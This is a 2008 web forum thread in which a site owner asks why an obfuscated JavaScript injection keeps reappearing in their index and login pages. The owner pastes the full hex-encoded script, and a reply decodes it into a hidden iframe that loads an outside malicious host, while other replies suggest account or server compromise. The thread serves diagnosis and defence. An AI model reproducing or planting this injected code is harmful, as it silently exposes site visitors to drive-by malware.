Jawed Posted July 7, 2008 Share Posted July 7, 2008 Hi all, I have a website running, it was fine few days back but now when a open the site it opens a blank page then i checed the code of the index page then i found that there is a javascript ebmedded in my code in all index pages and login pages, this javascirpt did open a blank page. I dowloaded whole site, deleted the code form the server scanned the code with kerpersky antivirus and notorn antivirus , both did not showed any virus in the code then i manuallyu checked all index and login named pages and no malacious code was there then i uploaded the site again , but for my bad luck then virus again come in Iframe.ph and again the site is not opening due to the same javascript code?????? i am using dreamweaver cs3 and my site is hosted on netsol. The problem is all the files named as index and login are affected, all the codes in these files get lost and this javascript is embedded <script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script> I tried many things but none worked out, even i removed the write permission of index and login files but this too did not work. Thanks in advance for any kind of help Can anyone help me in this regard ????? Quote Link to comment Share on other sites More sharing options...
darkfreaks Posted July 7, 2008 Share Posted July 7, 2008 should use a better antivirus such as NOD32 Quote Link to comment Share on other sites More sharing options...
tibberous Posted July 7, 2008 Share Posted July 7, 2008 Are you sure the virus is part of the files on your server? Maybe your computer got a virus or your account info got stolen, and a remote script is logging in as you and changing the files. I'd backup your files, reformat, change your password, then go over your site code and try to find the virus. If you are using a big CMS with too much code to wade through, just download the newest version and move your data over. Also, contact netsol and have them make sure you don't have any processes or bad crontabs set to run. Quote Link to comment Share on other sites More sharing options...
btherl Posted July 7, 2008 Share Posted July 7, 2008 Here's your virus decoded. 1st step: <script>function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c4'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35&%78%75%3d%31&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%31%35%32%37%29%2b%27%65%38%61%38%32%39%65%37%64%66%64%27%20%77%69%64%74%68%3d%35%36%33%20%68%65%69%67%68%74%3d%34%32%39%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script> 2nd step (results of unescape()): <iframe name=c4 src='http://google-analize.com/in.cgi?15&xu=1&'+Math.round(Math.random()*241527)+'e8a829e7dfd' width=563 height=429 style='display: none'></iframe> If the code keeps coming back then something is placing it there. I think Tibberous gave good advice there. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.